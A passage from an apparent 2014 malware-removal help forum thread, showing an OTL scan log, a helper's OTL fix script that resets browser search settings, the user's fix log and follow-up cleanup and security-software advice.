"98157A226B40B173301B0F53C8E98C47805D5152" = Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0)
"D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2" = Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1)
"GIMP-2_is1" = GIMP 2.8.2
"Microsoft Security Client" = Microsoft Security Essentials
"Zune" = Zune
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{04668DF2-D32F-4555-9C7E-35523DCD6544}" = Control ActiveX de Windows Live Mesh para conexiones remotas
"{05E379CC-F626-4E7D-8354-463865B303BF}" = Windows Live UX Platform Language Pack
"{0B0F231F-CE6A-483D-AA23-77B364F75917}" = Windows Live Installer
"{0D261C88-454B-46FE-B43B-640E621BDA11}" = Windows Live Mail
"{106AEB0E-1FF7-44BD-B510-6CF9A3934FAC}" = VIZIO_FN_Key_Utility
"{19BA08F7-C728-469C-8A35-BFBD3633BE08}" = Windows Live Movie Maker
"{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}" = Junk Mail filter update
"{200FEC62-3C34-4D60-9CE8-EC372E01C08F}" = Windows Live SOXE Definitions
"{240C3DDD-C5E9-4029-9DF7-95650D040CF2}" = Intel(R) USB 3.0 eXtensible Host Controller Driver
"{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}" = Skype™ 6.20
"{26A24AE4-039D-4CA4-87B4-2F03217071FF}" = Java 7 Update 71
"{28006915-2739-4EBE-B5E8-49B25D32EB33}" = Atheros WLAN Client Installation Program
"{2902F983-B4C1-44BA-B85D-5C6D52E2C441}" = Windows Live Mesh ActiveX Control for Remote Connections
"{2A3FC24C-6EC0-4519-A52B-FDA4EA9B2D24}" = Windows Live Messenger
"{3336F667-9049-4D46-98B6-4C743EEBC5B1}" = Windows Live Photo Gallery
"{34319F1F-7CF2-4CC9-B357-1AE7D2FF3AC5}" = Windows Live
"{34F4D9A4-42C2-4348-BEF4-E553C84549E7}" = Windows Live Photo Gallery
"{3A69FD31-5EE7-42C9-918B-81C07AA21043}" = Cirrus Logic Audio
"{3A9C1D7A-A227-442F-B296-14AEBC4E85C1}" = VIZIO Wireless Driver
"{3B9A92DA-6374-4872-B646-253F18624D5F}" = Windows Live Writer
"{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}" = Garmin USB Drivers
"{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}" = Intel(R) Rapid Storage Technology
"{3F0E78CA-735E-446D-8E60-69C6CA27EC95}" = VIZIO Wireless Touchpad
"{4814105D-5756-4CD7-9430-ADA474A3E192}" = USB3Setup
"{488F0347-C4A7-4374-91A7-30818BEDA710}" = Galerie de photos Windows Live
"{48C0DC5E-820A-44F2-890E-29B68EDD3C78}" = Windows Live Writer
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4F949BD9-1E99-40C7-9102-C67E2D384995}_is1" = VIZIOUtility version 1.0
"{55D003F4-9599-44BF-BA9E-95D060730DD3}" = Contrôle ActiveX Windows Live Mesh pour connexions à distance
"{579684A4-DDD5-4CA3-9EA8-7BE7D9593DB4}" = Windows Live UX Platform Language Pack
"{5D273F60-0525-48BA-A5FB-D0CAA4A952AE}" = Windows Live Movie Maker
"{62687B11-58B5-4A18-9BC3-9DF4CE03F194}" = Windows Live Writer Resources
"{65153EA5-8B6E-43B6-857B-C6E4FC25798A}" = Intel(R) Management Engine Components
"{6727F16E-6BF0-4E73-AC73-958A382AA09E}" = Perfect Photo Suite 7.0.1
"{682B3E4F-696A-42DE-A41C-4C07EA1678B4}" = Windows Live SOXE
"{6DEC8BD5-7574-47FA-B080-492BBBE2FEA3}" = Windows Live Movie Maker
"{77477AEA-5757-47D8-8B33-939F43D82218}" = Windows Live UX Platform Language Pack
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{78DAE910-CA72-450E-AD22-772CB1A00678}" = Windows Live Mesh
"{7D1C7B9F-2744-4388-B128-5C75B8BCCC84}" = Windows Live Essentials
"{83C292B7-38A5-440B-A731-07070E81A64F}" = Windows Live PIMT Platform
"{841F1FB4-FDF8-461C-A496-3E1CFD84C0B5}" = Windows Live Mesh
"{8833FFB6-5B0C-4764-81AA-06DFEED9A476}" = Realtek Ethernet Controller Driver
"{8C6D6116-B724-4810-8F2D-D047E6B7D68E}" = Mesh Runtime
"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT
"{8FF3891F-01B5-4A71-BFCD-20761890471C}" = Windows Live Messenger
"{90140000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2010
"{90140000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2010
"{90140000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2010
"{90140000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2010
"{90140000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2010
"{90140000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2010
"{90140000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2010
"{90140000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2010
"{90140000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2010
"{90140000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2010
"{90140000-003D-0000-0000-0000000FF1CE}" = Microsoft Office Single Image 2010
"{90140000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2010
"{90140000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2010
"{90140000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2010
"{90140000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2010
"{92EA4134-10D1-418A-91E1-5A0453131A38}" = Windows Live Movie Maker
"{95763F66-297E-30CE-9728-6D0F20BF97F5}" = Google Talk Plugin
"{96AE7E41-E34E-47D0-AC07-1091A8127911}" = Realtek USB 2.0 Card Reader
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{9D56775A-93F3-44A3-8092-840E3826DE30}" = Windows Live Mail
"{9FAE6E8D-E686-49F5-A574-0A58DFD9580C}" = Windows Live Mail
"{A0C91188-C88F-4E86-93E6-CD7C9A266649}" = Windows Live Mesh
"{A41A708E-3BE6-4561-855D-44027C1CF0F8}" = Windows Live Photo Common
"{A6C48A9F-694A-4234-B3AA-62590B668927}" = Intel(R) Manageability Engine Firmware Recovery Agent
"{A726AE06-AAA3-43D1-87E3-70F510314F04}" = Windows Live Writer
"{A9BDCA6B-3653-467B-AC83-94367DA3BFE3}" = Windows Live Photo Common
"{AAAFC670-569B-4A2F-82B4-42945E0DE3EF}" = Windows Live Writer
"{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}" = Apple Application Support
"{AAF454FC-82CA-4F29-AB31-6A109485E76E}" = Windows Live Writer
"{AB61A2E9-37D3-485D-9085-19FBDF8CEF4A}" = Windows Live Messenger
"{AC76BA86-7AD7-FFFF-7B44-AA0000000001}" = Adobe Reader X (10.1.12) MUI
"{C66824E4-CBB3-4851-BB3F-E8CFD6350923}" = Windows Live Mail
"{C893D8C0-1BA0-4517-B11C-E89B65E72F70}" = Windows Live Photo Common
"{CE95A79E-E4FC-4FFF-8A75-29F04B942FF2}" = Windows Live UX Platform
"{D0B44725-3666-492D-BEF6-587A14BD9BD9}" = MSVCRT_amd64
"{D436F577-1695-4D2F-8B44-AC76C99E0002}" = Windows Live Photo Common
"{D45240D3-B6B3-4FF9-B243-54ECE3E10066}" = Windows Live Communications Platform
"{DA909E62-3B45-4BA1-8B58-FCAEBA4BCEC9}" = NVIDIA PhysX
"{DDC8BDEE-DCAC-404D-8257-3E8D4B782467}" = Windows Live Writer Resources
"{DECDCB7C-58CC-4865-91AF-627F9798FE48}" = Windows Live Mesh
"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10
"{E5B21F11-6933-4E0B-A25C-7963E3C07D11}" = Windows Live Messenger
"{E727A662-AF9F-4DEE-81C5-F4A1686F3DFC}" = Windows Live Writer Resources
"{E85A4EFC-82F2-4CEE-8A8E-62FDAD353A66}" = Galería fotográfica de Windows Live
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
"{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}" = Intel(R) Processor Graphics
"{FCB3772C-B7D0-4933-B1A9-3707EBACC573}" = Intel(R) OpenCL CPU Runtime
"{FE044230-9CA5-43F7-9B58-5AC5A28A1F33}" = Windows Live Essentials
"Adobe Flash Player ActiveX" = Adobe Flash Player 15 ActiveX
"Audacity_is1" = Audacity 2.0.5
"Easy Wireless Setup" = Samsung Easy Wireless Setup
"LAME_is1" = LAME v3.99.3 (for Windows)
"Malwarebytes Anti-Malware_is1" = Malwarebytes Anti-Malware version 2.0.3.1025
"Office14.SingleImage" = Microsoft Office Home and Student 2010
"Samsung Easy Printer Manager" = Samsung Easy Printer Manager
"Samsung Printer Live Update" = Samsung Printer Live Update
"Tweaking.com - Registry Backup" = Tweaking.com - Registry Backup
"VLC media player" = VLC media player 2.1.3
"WinLiveSuite" = Windows Live Essentials
========== HKEY_USERS Uninstall List ==========
[HKEY_USERS\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"GoToMeeting" = GoToMeeting 5.3.0.1009
========== Last 20 Event Log Errors ==========
[ Application Events ]
Error - 11/6/2014 9:09:31 PM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
Error - 11/6/2014 9:09:31 PM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 9922
Error - 11/6/2014 9:09:31 PM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 9922
Error - 11/7/2014 4:59:00 AM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
Error - 11/7/2014 4:59:00 AM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 9984
Error - 11/7/2014 4:59:00 AM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 9984
Error - 11/8/2014 2:03:34 PM | Computer Name = Ryan-PC | Source = WinMgmt | ID = 10
Description =
Error - 11/8/2014 9:42:05 PM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: Continuously busy for more than a second
Error - 11/8/2014 9:42:05 PM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledEvent 9984
Error - 11/8/2014 9:42:05 PM | Computer Name = Ryan-PC | Source = Bonjour Service | ID = 100
Description = Task Scheduling Error: m->NextScheduledSPRetry 9984
[ System Events ]
Error - 11/8/2014 2:01:06 PM | Computer Name = Ryan-PC | Source = Service Control Manager | ID = 7034
Description = The Intel(R) Management and Security Application User Notification
Service service terminated unexpectedly. It has done this 1 time(s).
Error - 11/8/2014 2:01:06 PM | Computer Name = Ryan-PC | Source = Service Control Manager | ID = 7034
Description = The NVIDIA Update Service Daemon service terminated unexpectedly.
It has done this 1 time(s).
Error - 11/8/2014 2:01:06 PM | Computer Name = Ryan-PC | Source = Service Control Manager | ID = 7031
Description = The Windows Media Player Network Sharing Service service terminated
unexpectedly. It has done this 1 time(s). The following corrective action will
be taken in 30000 milliseconds: Restart the service.
Error - 11/8/2014 2:01:06 PM | Computer Name = Ryan-PC | Source = Service Control Manager | ID = 7031
Description = The Windows Search service terminated unexpectedly. It has done this
1 time(s). The following corrective action will be taken in 30000 milliseconds:
Restart the service.
Error - 11/8/2014 2:01:36 PM | Computer Name = Ryan-PC | Source = Service Control Manager | ID = 7032
Description = The Service Control Manager tried to take a corrective action (Restart
the service) after the unexpected termination of the Windows Search service, but
this action failed with the following error: %%1056
Error - 11/8/2014 2:01:36 PM | Computer Name = Ryan-PC | Source = Service Control Manager | ID = 7038
Description = The WMPNetworkSvc service was unable to log on as NT AUTHORITY\NetworkService
with the currently configured password due to the following error: %%50 To ensure
that the service is configured properly, use the Services snap-in in Microsoft
Management Console (MMC).
Error - 11/8/2014 2:01:36 PM | Computer Name = Ryan-PC | Source = Service Control Manager | ID = 7000
Description = The Windows Media Player Network Sharing Service service failed to
start due to the following error: %%1069
Error - 11/8/2014 2:02:40 PM | Computer Name = Ryan-PC | Source = Service Control Manager | ID = 7026
Description = The following boot-start or system-start driver(s) failed to load:
cdrom
Error - 11/8/2014 3:40:54 PM | Computer Name = Ryan-PC | Source = bowser | ID = 8003
Description =
Error - 11/8/2014 9:57:49 PM | Computer Name = Ryan-PC | Source = BTHUSB | ID = 327697
Description = The local Bluetooth adapter has failed in an undetermined manner and
will not be used. The driver has been unloaded.
< End of report >
After running this script please tell me how the computer is at the moment.
Run OTL.
Please copy the text in the Quote box below, (Do Not copy the word Quote), and paste it in the Posted Image box in OTL.
Under the Custom Scans/Fixes box at the bottom, paste in the following
To do that:
Highlight everything inside the quote box, (except the word Quote), right click the mouse and click Copy.
Copy (Ctrl+C) and Paste (Ctrl+V) all of the following text into the Custom Scans/Fixes box:
:OTL
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
:commands
[EMPTYFLASH]
[resethosts]
Click Run Fix.
Please post the contents of the fix log file back here if you are prompted to open the file. It can also be found at C:\_OTL\Moved Files as MMDDYYY_HHMMSS.log where MMDDYYY is date format and HHMMSS is time format.
If requested to reboot, please do so. The log file will open after restart.
Re-enable your security software as soon as you have completed the OTL fix steps.
ascot1340
2014-11-10, 04:29
The computer seems to be running normally at the moment. Here is the OTL log.
========== OTL ==========
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ deleted successfully.
64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ not found.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope| /E : value set successfully!
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ not found.
HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page| /E : value set successfully!
Registry key HKEY_USERS\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\ not found.
Registry key HKEY_LOCAL_MACHINE\Software\MozillaPlugins\@Apple.com/iTunes,version=\ deleted successfully.
File PTYFLASH] not found.
File sethosts] not found.
OTL by OldTimer - Version 3.2.69.0 log created on 11092014_212619
I feel like we need to give it a day and see what happens :)
ascot1340
2014-11-11, 03:06
I'll keep an eye on it and report back. Thanks!
ascot1340
2014-11-12, 03:12
Still seems fine
Download Delfix from here (http://general-changelog-team.fr/fr/downloads/finish/20-outils-de-xplode/9-delfix)
Ensure Remove disinfection tools is ticked
Also tick:
Create registry backup
Click Run
Purge system restore
Any other tools and files found can simply be deleted or uninstalled via Add/Remove Programs in the Control Panel etc.
Answers to common security questions - Best Practices (http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/) by quietman7, MVP
How Malware Spreads - How did I get infected? (http://www.bleepingcomputer.com/forums/t/287710/how-malware-spreads-how-did-i-get-infected/) by quietman7, MVP
Simple and easy ways to keep your computer safe and secure on the Internet (http://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/) by Lawrence Abrams, MVP
How to Prevent Malware (http://users.telenet.be/bluepatchy/miekiemoes/prevention.html) by miekiemoes, MVP
How to backup and restore your data using Cobian Backup (http://www.bleepingcomputer.com/tutorials/backup-and-restore-data-with-cobian-backup/) by YourHighness
Slow Computer/browser? It May Not Be Malware (http://www.bleepingcomputer.com/forums/t/87058/slow-computerbrowser-check-here-first;-it-may-not-be-malware/) by quietman7, MVP
The following programmes come highly recommended in the security community.
AdBlock (https://adblockplus.org/en/firefox) is a browser add-on that blocks annoying banners, pop-ups and video ads.
CryptoPrevent (https://www.foolishit.com/) places policy restrictions on loading points for ransomware (e.g. CryptoPrevent), preventing your files from being encrypted.
Malwarebytes Anti-Exploit (https://www.malwarebytes.org/antiexploit/) (MBAE) is designed to prevent zero-day malware from exploiting vulnerable software.
Malwarebytes Anti-Malware Premium (https://www.malwarebytes.org/) (MBAM) works in real-time alongside your Anti-Virus to prevent malware execution.
NoScript (http://noscript.net/) is a Firefox add-on that blocks the actions of malicious scripts by using whitelisting and other technology.
Sandboxie (http://www.sandboxie.com/) isolates programmes of your choice, preventing files from being written to your HDD unless approved by you.
Secunia PSI (http://secunia.com/vulnerability_scanning/personal/) will scan your computer for vulnerable software that is outdated, and automatically find the latest update for you.
SpywareBlaster (https://www.brightfort.com/spywareblaster.html) is a form of passive protection, designed to block the actions of malicious websites and tracking cookies.
Web of Trust (https://www.mywot.com/) (WOT) is a browser add-on designed to alert you before interacting with a potentially malicious website.
ascot1340
2014-11-13, 00:03
Ok, ran the Delfix. I'll let you know if the problem returns. Thanks again for all of your help!
Glad we could help. :)
Since this issue appears resolved ... this Topic is closed.